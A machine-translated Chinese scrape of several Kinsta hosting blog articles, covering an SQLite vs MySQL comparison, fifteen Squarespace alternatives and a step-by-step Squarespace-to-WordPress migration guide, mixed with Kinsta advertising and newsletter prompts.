像大多数 DBMSes 一样,MySQL 使用静态类型进行数据存储,这意味着您必须在创建表时定义列数据类型。
注册订阅时事通讯
想知道我们是怎么让流量增长超过 1000%的吗?
加入 20,000 多名获得我们每周时事通讯和内部消息的人的行列吧!
虽然大多数数据库引擎仍然使用静态类型来存储字符串数据,但是 SQLite 使用动态类型来存储数据—存储在列中的值决定了列的数据类型。例如,如果在创建时创建整数类型的表,则可以在此列中存储任何数据类型,因为该类型与值本身相关联,而不是与其容器相关联。此外,MySQL 对常见的静态类型具有向后兼容性。
SQLite 使用存储类存储数据,而不是数据类型。它们比数据类型更通用,可以采用以下存储类之一:NULL、INTEGER、TEXT、BLOB 和 REAL。
可量测性
MySQL 的服务器-客户端架构是为可伸缩性和大型数据库而精心设计的。服务器层简化了服务器的功能,而无需更新客户端。
相反,SQLite 仅限于单用户访问,难以实现可伸缩性。此外,随着数据库变大,所需的内存量也会增加。
轻便
MySQL 需要在移动前压缩成一个文件,随着数据库的增加,这可能需要很长时间。同时,SQLite 将数据库保存到一个文件中,使复制和传输变得容易。因为 SQLite 在虚拟机上运行查询,所以它对操作系统的依赖性很小。
安全性
任何人都可以编辑和查看 SQLite 的单个数据文件。SQLite 没有内置的身份验证系统,所以安全性仅限于对该文件设置的权限。
另一方面,MySQL 有许多安全特性,比如支持不同权限级别的用户管理和使用安全外壳(SSH) 。
易于设置
MySQL 需要很多配置,比如服务器配置、用户管理和备份。另一方面,SQLite 易于安装,不需要任何配置就可以运行。
Struggling with downtime and WordPress problems? Kinsta is the hosting solution designed to save you time! Check out our features
SQLite 与 MySQL:利弊
MySQL 优点:
- 简单易学
- 几乎兼容所有操作系统
- 与许多语言兼容,如 C++,PHP,Java,Perl 等。
- 支持多用户环境
- 高性能
MySQL 的缺点:
- 一些数据损坏的实例(尽管不严重)
- 调试工具需要一些改进
- 需要大量内存
SQLite 优点:
- 低服务器性能和内存需求
- 降低能耗
- 独立便携
- 默认包含在所有 PHP 安装中
SQLite 缺点:
- 不支持多用户环境或 XML 格式
- 一次只能处理一个连接
- 随着数据库大小的增加,性能会降低
- 无法从客户端查询数据库
SQLite vs MySQL:WordPress 哪个更好?
WordPress 是一个用 PHP 编写的流行的内容管理平台(CMS),它使用数据库来存储所有的网站信息,如用户数据、帖子、设置和内容。
WordPress 的默认数据库管理系统是 MySQL,这使得它成为大多数 WordPress 站点事实上的选择。它非常适合大型项目,因为它易于扩展并提供更高的安全性。然而,SQLite 非常适合于连接较少的小型项目,尤其是如果您需要跳过复杂的 MySQL 数据库配置的话。
虽然您可以使用变通方法让 SQLite 与 WordPress 一起工作,但这并不简单。WordPress 核心团队已经开始讨论让 WordPress 官方支持 SQLite 。实现这个特性可能需要一些时间,但是在 WordPress 安装过程中选择数据库类型将会非常有帮助。
还有 MariaDB,它是更大的 MySQL 的一个变种。MariaDB 提供了改进的性能、更敏捷的更新和更好的许可。虽然它们大体相似,但在某些情况下,MariaDB 更好。你可以在这里阅读更多关于 MariaDB vs MySQL 的内容。
摘要
数据库对于大多数应用程序来说是必不可少的。虽然数据库有不同的许可类型,但是开源数据库管理系统为其他专有解决方案提供了一个很好的替代方案。
比较 SQLite 和 MySQL 具有挑战性,因为两者都有便利的特性和独特的用例。SQLite 是轻量级和可移植的,更适合物联网和低流量网站等小规模应用。另一方面,MySQL 拥有庞大的社区基础,更适合可伸缩的应用程序。
合适的工具取决于您应用的独特要求。选择完美的存储和托管解决方案可能很有挑战性。然而,不要烦恼!我们可以帮助。
让你所有的应用程序、数据库和 WordPress 网站在线并在一个屋檐下。我们功能丰富的高性能云平台包括:
- 在 MyKinsta 仪表盘中轻松设置和管理
- 24/7 专家支持
- 最好的谷歌云平台硬件和网络,由 Kubernetes 提供最大的可扩展性
- 面向速度和安全性的企业级 Cloudflare 集成
- 全球受众覆盖全球多达 35 个数据中心和 275 多个 pop
在第一个月使用托管的应用程序或托管的数据库,您可以享受 20 美元的优惠,亲自测试一下。探索我们的计划或与销售人员交谈以找到最适合您的方式。
构建网站的 15 个最佳选择
Squarespace 可能看起来像是网站建设者的“首选”,但它不是唯一的选择。事实上,有很多选择对某些用户来说往往更好。
由于其简单的界面和时尚的模板(也许还有其积极的营销活动),Squarespace 迅速成为世界上最受欢迎的网站建设者。虽然这可能是一个快速简单的选择,但它可能不具备一个成功网站所需要的一切。
在本帖中,我们将介绍一些我们最喜欢的 Squarespace 替代品,以及在选择时应该注意的事项。请继续阅读,了解更多信息。
为什么要使用 Squarespace 替代方案?
尽管它很受欢迎,界面也很简单,但 Squarespace 的一些功能缺乏深度。
虽然该平台提供了时尚的设计选项和一些基本的电子商务工具,但它们相当有限。因此,越来越多的 Squarespace 用户发现他们正在寻找更好的替代方式来发展他们的网站。
当然,这并不是说 Squarespace 是一个“糟糕”的网站建设者——它绝不是。然而,那些不仅仅想从模板中构建一个基本网站的人可能会考虑一些 Squarespace 替代方案。
但是你怎么知道你是否首先需要一个替代品呢?
为了帮助你,我们收集了许多 Squarespace 用户经常遇到的场景列表。无论你是已经在使用 Squarespace,还是仍在货比三家,在决定是换还是买的时候,都要考虑这些因素。
功能范围
虽然 Squarespace 有很多内置特性和集成,但它们确实是:内置的。
因此,用户也被限制在这些功能上,无法集成第三方应用程序来改善其网站的功能。对于希望构建一个基本网站之外的网站的用户来说,这个限制是非常有限的。
正如我们稍后将在我们的顶级 Squarespace 备选方案中看到的,许多其他网站建设者允许第三方应用程序或定制功能和软件的集成。
除了应用集成,Squarespace 用户的设计功能也很有限。尽管 Squarespace 的模板和设计非常时尚,布局也很好,但它们几乎没有提供定制和个性化设计的空间。
The Squarespace interface
更多灵活性
Squarespace 用户的设计灵活性也有限。虽然我们在前面的部分已经提到了这一点,但是 Squarespace 和 leading alternatives 之间的一些细微差别还是值得注意的。
首先,许多替代方案为用户提供了一个“空白画布”。无论你是一个完全的初学者还是网页设计专家,大多数选择都让你在设计网页时拥有完全的灵活性。相比之下,Squarespace 只提供相对较少的模板。
说到模板,很多替代品也为用户提供了可定制的模板。对于像 WordPress 这样的网站建设者来说,这也可以包括访问第三方模板和定制设计。因此,大多数替代方案允许用户构建他们能想象的任何东西——不管最终结果如何。
Looking to move away from Squarespace? 👀 Check out this roundup 🚀Click to Tweet
电子商务选项
尽管 Squarespace 也有一些可靠的电子商务选项,但它们仅限于基本的店面、购物车和预约安排。
作为一个基本网站的扩展,这可能足以运行在线商店,但它没有提供足够的功能和可扩展性来支持更多的电子商务专用网站。因此,那些希望推出在线零售、订购平台或其他更“完整”的电子商务解决方案的人应该考虑更强大的 Squarespace 替代方案。
Squarespace 有限的第三方电子商务应用程序也使得它无法集成更受欢迎的工具,如 Shopify 和 PayPal。
第三方应用
Squarespace 不提供应用程序,只提供预批准工具的集成。因此,用户被限制在 Squarespace 认为他们需要的任何东西上,并且通常不能使用他们想要的应用和工具。
我们已经提到了电子商务工具的这一限制,但它适用于几乎所有其他类别。
其中一个类别是网络分析。虽然 Squarespace 提供了专有的分析工具,但它还不足以与专业的搜索引擎优化(SEO)和商业智能平台相竞争。
虽然 Squarespace 在支持与 Google Workspace 等流行应用的集成方面做得很好,但那些有专业第三方应用需求的人可能需要一个更加定制的解决方案。
简单
尽管 Squarespace 的简单性和直观界面是其主要优势,但在该平台上建立一个网站仍然需要一些努力。幸运的是,有几种替代方案提供了更简单的设置,有些甚至具有全自动设计选项。
多用户协作
建立和管理一个网站可能需要一个团队,尤其是对于一个公司或小型企业。
在这种情况下,最好选择一个促进多用户协作的网站建设者。虽然 Squarespace 允许额外的用户作为“贡献者”提供内容,但它不像有多个管理员或 web 开发人员那样灵活。因此,团队应该考虑更灵活的包来促进协作。
定价和费用
截至 2022 年 4 月,个人计划的起价为每月 14 美元,Squarespace 肯定比建立和管理自己的网站要贵一些。虽然额外的便利可能证明了一些人的成本,但仍有其他成本和费用要考虑。
一个例子是 Squarespace 对商业计划用户收取 3%的交易费。虽然 Squarespace 的其他高级计划没有这项费用,但下一个可用的选择是每月支付 27 美元的商业计划。
由于有许多更便宜的 Squarespace 替代品,对于已经在处理商户和销售点费用的小企业来说,这可能不是一个好的选择。
2022 年 15 大方形空间选择
Squarespace 是一个伟大的网站建设者,但也有许多同样伟大的替代品。为了帮助缩小你的搜索范围,我们汇编了 15 个 Squarespace 备选方案,几乎涵盖了所有的需求和应用。
1.WordPress
The WordPress user dashboard
WordPress 是建立网站的最强大的工具之一。虽然它比 Squarespace 这样的“拖放”工具需要更多的技术知识,但它提供了完全的定制,并与店面的 Woocommerce 这样的插件集成。
虽然 WordPress 可以免费使用,但是用户必须为他们自己的模板、插件等等付费。然而,有了许多免费的模板和插件,无需付费订阅就可以进行大量的定制。
顶级功能:
- 完全可定制
- 无限插件
- 基于使用的价格
价格:各不相同
2.金斯塔
MyKinsta hosting dashboard
当我们谈到 WordPress 的时候,通过 WordPress 托管和自托管有很大的不同。虽然一开始直接通过 WordPress 托管可能更方便,但是自托管是一个更灵活的选择。
自托管有两种形式:在自己的服务器上托管或使用托管服务。
虽然您肯定可以建立和管理自己的服务器,但它会带来很多开销。在必须执行例行(阅读:乏味)管理和定期安全检查之间,自己托管可能很快变得耗时、昂贵,并且难以扩展和适应。
因此,许多人使用托管 WordPress 主机来轻松地构建、缩放和维护他们的网站,因为他们的需求发生了变化。
有了 Kinsta 的应用、数据库和托管 WordPress 托管服务,团队可以快速构建强大的托管解决方案,根据他们网站的需求和用例进行定制。
此外,由于一切都在云中,监控资源使用、访问者流量和其他统计数据都可以在单个仪表板上获得。
顶级功能:
- 高可扩展性
- 快速基础设施
- 不同网站的定制解决方案
- 便捷的仪表板
- 全天候安全、支持和正常运行时间监控
价格:$ 30-$ 1500/月(也提供企业计划)
3.威克斯
The Wix Editor interface
就像 Squarespace 一样受欢迎(如果不是更受欢迎的话), Wix 是运行时间最长、最灵活的站点构建器之一。
Wix 提供 500 多个完全可定制的模板,是企业家和预算有限的人的理想选择。有了这么多的灵活性,你可以使用一套简单直观的工具设计几乎任何网站。
虽然免费计划将要求您使用 wix.com 子域,付费用户可以使用自己的域名和托管包。
顶级功能:
- 500 多个模板
- 无限的存储空间和页数
- 拖放编辑器
价格:$ 0-$ 49/月(也提供企业计划)
4. Weebly
The Weebly site editor interface
虽然与 Wix 非常相似,但 T2 比 T3 更容易使用。事实上,它可能是我们见过的最简单和用户友好的网站生成器。
然而,简单性的增加是以更少的功能为代价的。尽管付费会员可以解锁定制域名和电子商务工具等功能,但它仍然比大多数网站建设商更加简单。即便如此,它仍然是构建简单网站的绝佳选择。
顶级功能:
- 非常方便用户
- 简单界面
- 广泛的模板和应用选择
价格:$ 0-$ 30/月
5. Shopify
Shopify ecommerce dashboard
Shopify 在全球拥有超过 500,000 家活跃商户,是电子商务的黄金标准。虽然 Squarespace 和其他网站建设者可能提供尚可的电子商务工具,但没有一个能提供 Shopify 的可扩展性、声誉和可靠性。
在这一点上,Shopify 的每一个功能都是为在线销售而优化的。这意味着,无论你是在配置产品页面,还是在设计网站的购物车界面,Shopify 都会帮助你优化每一步的销售。
顶级功能:
- 优秀的电子商务工具
- 应用商店
- 经得起未来考验的销售点
价格:$ 26-$ 2000/月
6.Webnode
Adding a section with Webnode’s site editor
尽管在大多数方面,Webnode 是一个相当典型的站点构建器,但在构建多语言站点方面,它是首屈一指的。由于支持大多数语言,标准计划用户(12+/月)可以让他们的网站自动翻译成多种受众。
另一个独特的功能是电子邮件支持。大多数网站建设者和主机要求你建立自己的网络电子邮件,Webnode 默认提供。
顶级功能:
- 多语言网站
- 吸引人的模板
- 包含电子邮件
价格:$ 3.90-$ 22.90/月
注册订阅时事通讯
想知道我们是怎么让流量增长超过 1000%的吗?
加入 20,000 多名获得我们每周时事通讯和内部消息的人的行列吧!
Subscribe Now ### 7.吉姆多
The Jimdo site builder interface in action
另一个简单的站点构建器,Jimdo 的工具和界面比 Squarespace、Wix 和许多其他流行的选项更容易使用。虽然在许多方面与 Weebly 相似,但 Jimdo 也针对速度进行了优化。仅这个特性就让它成为构建简单、高速网站的另一个绝佳选择。
顶级功能:
- 非常方便用户
- 简单界面
- 速度优化的页面
价格:$ 0-$ 39/月
8.Webflow
Webflow’s front-end design interface
Webflow 主要面向前端设计人员和开发人员,提供了一些非常前沿的网页设计工具。然而,虽然 Webflow 用户可以享受完全的定制和控制,但高端包需要一点学习曲线。
顶级功能:
- 完全定制和灵活性
- 尖端设计工具
- 将代码导出到其他应用程序
价格:$ 12-$ 200/月(也提供企业计划)
9.Gator 网站构建器
Adding content with the Gator website builder
Gator 网站生成器是另一个简单的“拖放”选项,由流行的虚拟主机服务 HostGator 提供。虽然它和 Wix 一样易于使用,并提供了几个有吸引力的设计,但它的功能并不丰富。
尽管如此,对于那些已经使用 HostGator 进行虚拟主机或域名注册的人来说,这仍然是一个非常方便的选择。
顶级功能:
- 使用方便
- 站点回滚功能
- 精心设计的模板
价格: $9.22-$19.98
10.你怀疑吗
The many different page options available in Duda
除了一些很棒的页面模板,杜达在支持多语言网站和页面个性化方面是独一无二的。有了个性化功能,你可以为不同的访问者以不同的方式显示你的网站。
顶级功能:
- 使用方便
- 多语言网站
- 访问者网站个性化
价格:$ 14-$ 44/月(也提供企业计划)
11.显著地
Some of the many templates available from Strikingly
没有什么比一个好的首页更能给人留下“引人注目”的第一印象了——而这正是引人注目的意义所在。作为少数几个专注于单页网站的网站建设者之一,它是构建登陆页面、作品集等等的绝佳选择。
顶级功能:
- 单页网站设计的优秀模板
- 使用方便
- 包括域名
价格:$ 0-$ 49/月
Struggling with downtime and WordPress problems? Kinsta is the hosting solution designed to save you time! Check out our features
12.GoDaddy
The GoDaddy Website Builder dashboard
另一个 web 主机站点构建器,GoDaddy 让现有用户可以很容易地在他们当前的域名或主机包中快速建立一个网站。然而,它也提供了一些令人惊讶的令人印象深刻的和可扩展的电子商务、营销、搜索引擎优化等工具。
顶级功能:
- 使用方便
- 内置的应用程序和工具
- 支持可伸缩性
价格:$ 6.99-$ 17.49/月
13.货物
The Cargo site editor interface
如果你是一个有创造力的人,不要再看货物了。作为艺术家的网站建设者,Cargo 的 70 多个不同寻常(但令人惊叹)的模板是完全可定制的,从颜色到字体,以及介于两者之间的一切。
顶级功能:
- 独特的模板和布局
- 专为艺术家打造
- 完全可定制
价格:$ 19-$ 28/月(但学生免费!)
14.CMS 集线器
Building a basic page in CMS Hub
作为 HubSpot 的网站建设者,CMS Hub 更像是一个完整的内容管理系统(CMS) 而不是一个页面建设者。即便如此,它提供了你可能从其他提供商那里期待的同样的拖放编辑器工具,所有这些工具都与 HubSpot 著名的营销和销售工具集成在一起。
顶级功能:
- 拖放式设计
- 集成的内容管理系统
- 额外的站点安全性
价格:$ 23-$ 1200/月
15.前导页
Editing a site header in Leadpages
将访客转化为顾客是一个巨大的挑战。Leadpages 帮助其用户克服了专门用于转换的布局和模板之间的差距。凭借内置的销售和分析工具,它是销售和营销团队的绝佳选择。
顶级功能:
- 为转换优化的模板
- 包含的销售工具
- 性能分析
价格:$ 49-$ 99/月
如何选择适合你的网站建设者
虽然每个网站建设者都有其独特的优势(和独特的缺点),只有少数可能适合你。但是有这么多选择,你怎么能选择一个正确的呢?
不管是不是 Squarespace,最好的网站建设者应该满足你的需求。当你开始搜索的时候,问问你自己你想达到什么目的,你想使用什么工具,你期望什么功能,这样你就能确切地知道要找什么。
考虑你的需求
你肯定知道你需要一个网站,否则,你可能不会选择一个网站建设者。真正的问题是你需要那个网站做什么。
虽然每个网站建设者都可以从技术上建立一个网站,专业网站往往需要专业的工具。例如,虽然 Squarespace 可以快速部署主页和基本的购物功能,但企业级电子商务网站可能需要更强大的硬编码解决方案。
在任何情况下,总是考虑你到底想要你的网站做什么。它甚至可能有助于列出一个清单,看看你审查的每一个网站建设者是否能勾选你所有的框。这样做,你将确保自己不会在支付订阅费后被一个缺失的功能吓到。
检查设计选项(和限制)
即使你需要的只是一个“简单”的网站,设计仍然是一个重要的考虑因素。
好的设计不仅能让访问者更容易地使用和浏览你的网站,还能说明很多关于你或你的公司的事情。同样,设计也会影响用户对你网站目的的理解。例如,你可能不想把你的个人博客当作公司主页来显示。
诚然,大多数网站建设者提供足够的模板,以涵盖大多数类型的网站。然而,这些模板正是:模板。因此,拥有定制设计选项以脱颖而出并传达您的品牌身份非常重要。
正如我们之前提到的,Squarespace 用户经常面临非常有限的设计选择。虽然设计和模板都很时尚,但从大多数标准来看,它们也很普通。虽然这对于许多用途来说可能是好的,但对于更有创造力的类型来说,这可能会令人窒息。
在任何情况下,确保你的网站建设者的设计选项符合你的需求和创意。上面列出的许多 Squarespace 备选方案允许用户从头开始创建设计,甚至构建他们自己的模板。
确定您的电子商务需求
无论你是一个小精品店还是一个成熟的零售商,电子商务将是选择网站的最大因素之一。
虽然几乎每一个现代网站建设商都提供某种形式的电子商务集成,但它们在特性和功能上有很大不同。例如,虽然 Squarespace 的电子商务选项可能非常适合简单的店面,但拥有大量目录和销售点系统的在线服装店可能更适合使用类似 Shopify 的产品。
当然,你的电子商务平台不一定来自你选择的网站建设者。如果您已经使用了一个特定的平台或者已经有了一个这样的平台,那么检查您的站点构建器是否支持集成可能更重要。正如我们所见,像 Squarespace 这样的网站建设者很少允许这种选择。
检查与您的应用的兼容性
如果你使用应用程序进行网络分析或搜索引擎优化,你肯定会希望确保你的网站建设者支持它们——即使它已经提供了自己的版本。
如果您正在使用现有的技术,例如电子商务、分析、CRM 和 SEO 工具的组合,这一点尤其重要。除非你愿意做一些大规模的(昂贵的)改变,否则你将需要一个支持与你已经拥有的集成的站点构建器(或者一个定制的解决方案)。
问问你的团队
如果你计划和一个团队一起建设和/或管理你的网站,那么他们应该完全了解(并且完全熟悉)你选择的网站建设者。
即使你找到了“完美”的网站建设者,它也只能和你团队的能力一样完美。例如,许多人选择网站建设者为他们的易用性。然而,如果即使是一个“简单”的网站建设者为你的团队提供了一个陡峭的学习曲线,那么它并不比最差的选择更好。
这可能是一个不太可能的场景,但却是一个需要考虑的重要问题。在决定平台之前,一定要检查团队的偏好和能力。
考虑成本
似乎大量的功能还不够,网站建设者也有大量的价格。这些价格从完全免费到每月数百美元不等。
在大多数情况下,你会得到你所付出的。总的趋势是,更高的价格要么提供更多的定制、更多的功能,要么为用户、交易等提供更大的容量。
然而,简单地多付钱并不总是保证网站建设者会满足你的确切需求。例如,Squarespace 的商业计划比个人计划多提供 10 美元的电子商务工具,但在使用他们的工具时,还会额外收取 3%的交易费。
别忘了主持
虽然许多网站建设者包括托管作为他们的软件包的一部分,使用它可以有几个警告。
首先,你对主机服务器几乎没有控制权,这可能会影响你的流量或搜索引擎优化工作。此外,由于许多网站建设者在一个共享服务器上托管多个网站,如果你的网站服务器上的其他网站排名很低,或者在最糟糕的情况下,有犯罪历史,你的网站可能会受到负面影响。
在大多数情况下,最好选择一个独立于你的网站建设者的托管计划。选择自己的托管计划不仅让你更加灵活和安全,而且比网站建设商提供的托管计划更便宜、更可靠。
Squarespace 可能是最受欢迎的网站建设者,但像 WordPress 和 Shopify 这样的替代者提供了额外的功能和更好的性能——通常价格更具 T2 竞争力。
如果你正在用 WordPress 建立你的下一个网站,你需要一个强大的托管计划来支持它。有了 Kinsta 的托管 WordPress 主机,您可以享受闪电般的性能和 24/7 全天候的安全和支持。
探索我们的托管计划或联系我们今天就和来自 Kinsta 的 WordPress 专家一起安排演示!
让你所有的应用程序、数据库和 WordPress 网站在线并在一个屋檐下。我们功能丰富的高性能云平台包括:
- 在 MyKinsta 仪表盘中轻松设置和管理
- 24/7 专家支持
- 最好的谷歌云平台硬件和网络,由 Kubernetes 提供最大的可扩展性
- 面向速度和安全性的企业级 Cloudflare 集成
- 全球受众覆盖全球多达 35 个数据中心和 275 多个 pop
在第一个月使用托管的应用程序或托管的数据库,您可以享受 20 美元的优惠,亲自测试一下。探索我们的计划或与销售人员交谈以找到最适合您的方式。
如何从 Squarespace 迁移到 WordPress (7 个步骤)
Squarespace 是一个直观的平台,可以轻松创建简单的网站和在线商店。但是,它的功能有限。所以,你可能在寻找一个更灵活的解决方案,比如 WordPress 。
从 Squarespace 迁移到 WordPress 可以帮助你的网站更上一层楼。有了 WordPress,你可以用几十种方式定制你的内容,使用页面生成器插件和块编辑器。最重要的是,你不需要支付使用内容管理系统(CMS) 或解锁附加功能。
在这篇文章中,我们将告诉你在开始从 Squarespace 迁移到 WordPress 之前你需要知道的事情。然后,我们会一步一步地引导你完成这个过程。
我们开始吧!
T3】
查看我们的视频指南从 Squarespace 迁移到 WordPress
为什么从 Squarespace 转移到 WordPress
如果你正在做你的第一个网站,并且你不确定主机如何工作或者如何把所有的东西放在一起,Squarespace 是一个很好的选择。有了 Squarespace,你可以将托管、页面构建功能和营销工具捆绑到一个平台上。
这样做的问题是你被束缚在使用 Squarespace 上。如果你想获得更好的功能,你需要支付更昂贵的计划。
Kinsta 把我宠坏了,所以我现在要求每个供应商都提供这样的服务。我们还试图通过我们的 SaaS 工具支持达到这一水平。
最贵的 Squarespace 计划每月花费 40 美元,你可以使用诸如销售订阅、提供折扣和高级运输功能等功能。同样的价格,你可以支付一个顶级的托管 WordPress 托管计划,并使用免费插件来访问所有这些相同的功能。当你完成时,你甚至可能还有剩余的钱。
从 Squarespace 迁移到 WordPress 之前需要考虑的事情
即使你使用的是迁移插件,移动一个网站也会很耗时。迁移过程本身通常不需要很长时间。然而,在这一进程开始之前,需要做一些准备工作。我们来看看主要的。
寻找 WordPress 网络主机
使用 WordPress 的最大好处之一就是你可以自由选择任何你想要的网络主机。CMS 与你能找到的任何托管计划和提供商合作。然而,如果你把搜索的重点放在 WordPress 友好的网络主机上,你会轻松很多。
就我们而言,托管 WordPress 主机是大多数网站的发展方向。有了托管服务,你就可以让专注于发展你的网站和发布内容,而你的网络主机则负责优化、保护你的网站和备份任务。
Kinsta 提供了广泛的托管 WordPress 托管计划,以适应不同的预算。对于每一项计划,您都可以访问相同的高性能服务器,以及一系列使您能够专注于运营网站的功能,包括:
有很多优秀的 WordPress web 主机可供你选择。我们建议你不要满足于你能找到的最便宜的托管计划。相反,在你注册一个计划之前,花点时间看看评论,看看一些最好的虚拟主机能提供什么。
如果您注册了 Kinsta 计划,您可以受益于我们的迁移服务。我们在迁移过程中提供帮助,根据你来自哪个平台,我们的 WordPress 专家可以为你完成整个迁移。
T3】
备份您的 Squarespace 数据
需要注意的是,在迁移到 WordPress 的过程中,你的 Squarespace 网站不会受到任何影响或消失。这意味着在开始“移动”网站之前,您不需要备份网站。
无论如何,Squarespace 不提供常规的备份功能。这个平台不能让你创建网站的完整副本,万一出了问题,你只需点击几下就可以恢复。
Squarespace 允许你导出你的网站数据,这是一种备份。我们将在迁移到 WordPress 的过程中使用导出的数据,所以让我们直接进入主题。
想要更大的创作弹性?Squarespace ➡️ WordPress 的一个转变可能是答案... 点击推文
如何从 Squarespace 迁移到 WordPress (7 个步骤)
从 Squarespace 迁移到 WordPress 需要导出前者的所有内容,然后导入后者。这个过程比你想象的要简单,但是在我们开始之前,你需要安装 WordPress。
步骤 1:安装 WordPress
现在你有了一个网站主机和一个计划,是时候安装 WordPress 了。当你创建一个新网站时,一些托管的 WordPress 主机会给你提供自动安装 CMS 的选项:
在 MyKinsta 中安装 WordPress。
如果你的主机不提供这个功能,还有其他的选择。一些主机控制面板,如 cPanel,包括内置的软件安装程序,有几十个选项。
例如,Softaculous 可以让你在几分钟内建立一个 WordPress 网站:
心软。
你也可以手动安装 WordPress,这比听起来容易得多。整个 CMS 可以在 WordPress.org 下载。你可以将 WordPress 文件上传到你的服务器上,然后运行“五分钟”WordPress 安装程序,它会引导你完成整个过程。
第二步:从 Squarespace 导出你的网站内容
Squarespace 允许你将网站的大部分内容导出到一个 XML 文件中,但不是全部内容。以下是该平台允许您带给新主机的内容:
- 页面和帖子(以及站点的主博客页面)
- 图库页面
- 文本和嵌入块
总的来说,Squarespace 使您能够导出站点的大部分内容。然而,如果你正在使用 Squarespace 经营一家网上商店,你可能就没那么幸运了。这是因为该平台的导出文件不包括产品页面、图像、音频或视频文件,或者您网站上的任何自定义 CSS。
要将这类内容转移到 WordPress,你需要手动复制/粘贴或者从头开始。同样,将 Squarespace 图片导入 WordPress 也是一件苦差事,需要使用插件。
现在,让我们继续导出 Squarespace 允许您下载的内容。为此,请访问您网站的仪表盘,进入设置>高级>导入/导出。你会在右边看到你的网站的预览,在左边看到一个菜单,其中包括一个写着导出的选项:
从 Squarespace 导出内容。
点击导出,,Squarespace 会显示一个选项,将你的文章和页面导出到 WordPress。继续并选择 WordPress 图标:
导出到 WordPress 图标。
Squarespace 需要一分钟时间来准备您的站点以便导出。当 XML 文件准备就绪时,下载它的选项将出现在左侧的菜单中:
下载 XML 文件。
将该文件保存到您的计算机上,并记下您保存它的位置。这个文件使得从 Squarespace 迁移到 WordPress 成为可能,下一步您将需要它。
步骤 3:将你的 Squarespace 内容导入 WordPress
WordPress 提供了大量的工具,可以让你将不同类型的内容导入到平台中。尽管 WordPress 中没有专门的 Squarespace 导入工具,但 CMS 可以导入 XML 格式的内容。
进入你的 WordPress 仪表盘,跳转到工具>导入来访问这个特性。在页面底部寻找 WordPress 选项,点击立即安装:
寻找 WordPress 选项。
如果已经设置了 WordPress 导入工具,你会看到运行导入器选项。点击它,WordPress 会要求你选择一个 XML 文件来上传:
注册订阅时事通讯
想知道我们是怎么让流量增长超过 1000%的吗?
加入 20,000 多名获得我们每周时事通讯和内部消息的人的行列吧!
运行导入工具。
选择您在上一步中下载的文件,点击上传文件并导入。现在你可以在 WordPress 中将你想从 Squarespace 导入的文章和页面分配给一个新的或现有的作者:
在 WordPress 中分配作者。
你还会看到一个将附件从 Squarespace 导入 WordPress 的选项。启用该选项并点击提交。根据您导入的数据量,此过程可能需要一段时间。完成后,您会看到一条成功消息。
你现在可以通过导航到帖子或页面标签来检查所有导入的内容。正如我们之前提到的,Squarespace 导出文件不能让你将图片导入 WordPress。为此,我们需要使用一个插件。
步骤 4:从 Squarespace 导入图像
一个网站不是没有图片,除非你还生活在 90 年代。将你的 Squarespace 图片放入 WordPress 的一个方法是下载所有图片,将每个文件上传到你的新网站,然后将它们一个一个地放入你的内容中。然而,没有人有时间做所有这些,除非你只是导入几页。
自然,一些插件可以自动导入 Squarespace 图片到 WordPress。我们最喜欢的工作叫做自动上传图片:
自动上传图片。
这个插件在你的文章和页面中寻找图片网址。然后,它自动获取这些网址,下载图片,并上传到 WordPress,替换原来的网址。
当你将 Squarespace 数据导入 WordPress 时,CMS 不会自动上传图片。然而,它确实导入了原始的 Squarespace 图像 URL,这意味着这个插件非常适合您的需求。
首先,安装并激活插件,然后转到仪表板中的帖子>所有帖子。选择靠近屏幕顶部的屏幕选项菜单,并将每页条目数选项更新为一个数字,该数字将在一页上显示你所有的 WordPress 文章。然后,点击应用:
一次更新所有帖子。
这样,你可以一次更新你所有的 WordPress 文章,这将使插件能够一次性导入所有的图片。
现在,选择你网站上的所有帖子,打开批量操作菜单,点击编辑:
选择【编辑】下的批量操作。
将出现一个菜单,显示您现有帖子的批量编辑选项。点击更新而不选择任何选项,等待页面重新加载。
所有的 Kinsta 托管计划都包括来自我们资深 WordPress 开发者和工程师的 24/7 支持。与支持我们财富 500 强客户的同一个团队聊天。查看我们的计划!
当你点击更新时,你可能会遇到的一个问题是页面需要很长的时间来重新加载或更新。这是因为 WordPress 会导入你的网站丢失的 Squarespace 图片,并更新每篇文章。如果你使用的是慢速网络主机,这个过程会导致 WordPress 超时:
你可能会得到超时警告。
如果发生这种情况,你需要小批量更新帖子,而不是一次上传所有帖子的图片。你一次可以处理的文章数量很大程度上取决于你的主机服务。
记住,你还需要为你的 WordPress 页面重复整个过程。之后,你所有的 Squarespace 内容都应该出现在 WordPress 中,没有一张图片丢失。
第五步:将你的域名指向 WordPress
目前,你用于网站的域名仍然指向 Squarespace 的域名服务器。不用为你的 WordPress 网站注册一个新域名,你可以更新你现有的域名。这样,当访问者输入域名时,他们就会出现在你的新网站上。
更新域设置的过程会有所不同,这取决于您在哪里注册了该域。例如,如果你使用了一个域名注册商,你需要登录你的账户来管理它的 DNS 设置(告诉它指向的域名的信息):
管理 DNS。
一些 web 主机允许您通过它们的控制面板注册和管理域。在这种情况下,你需要访问面板来更新 DNS 记录,并将域名指向你的新 WordPress 网站。
如果你正在使用 Kinsta,你可以使用 MyKinsta 将域名指向你的网站。这个过程适用于使用和不使用 Kinsta Cloudflare CDN 的网站。
步骤 6:更新你的 WordPress 永久链接结构
如果你现在打开任何你的 WordPress 帖子或页面,你会注意到它们的 URL 可能是这样的:
yourwebsite.com/?p=123
这是 WordPress 使用的默认 URL 或永久链接结构。每个帖子或页面都有一个唯一的 ID,它的 URL 包含这个号码。建议你在网站生命周期的早期就改变永久链接的结构。否则,它会影响您网站的搜索引擎优化(SEO ),并导致重大的技术错误。
要更改您网站的永久链接结构,请在您的仪表板中进入设置>永久链接,并选择您想要使用的 URL 类型:
更新永久链接结构。
在我们看来,最好的永久链接结构是帖子名称。只要你为网站上的每个帖子和页面设置了一个独特的 slug,那么帖子名称结构就会产生你所看到的最短最干净的 URL。
您可以自由选择您喜欢的 permalink 结构,但是我们建议不要使用 Plain 选项。当你准备好了,保存你的修改,然后进入最后一步。
步骤 7:为你的 WordPress 网站选择一个主题
Squarespace 网站有一个非常精致的外观。当你把 Squarespace 的内容导入 WordPress 时,你可能会觉得它看起来不像你以前的网站那么圆滑。然而,有了正确的主题,你的 WordPress 网站会比 Squarespace 网站看起来更好。
WordPress 在主题方面给了你大量的选择。免费的WordPress.org 主题库是一个开始寻找类似你的旧 Squarespace 网站风格的好地方:
WordPress 主题知识库。
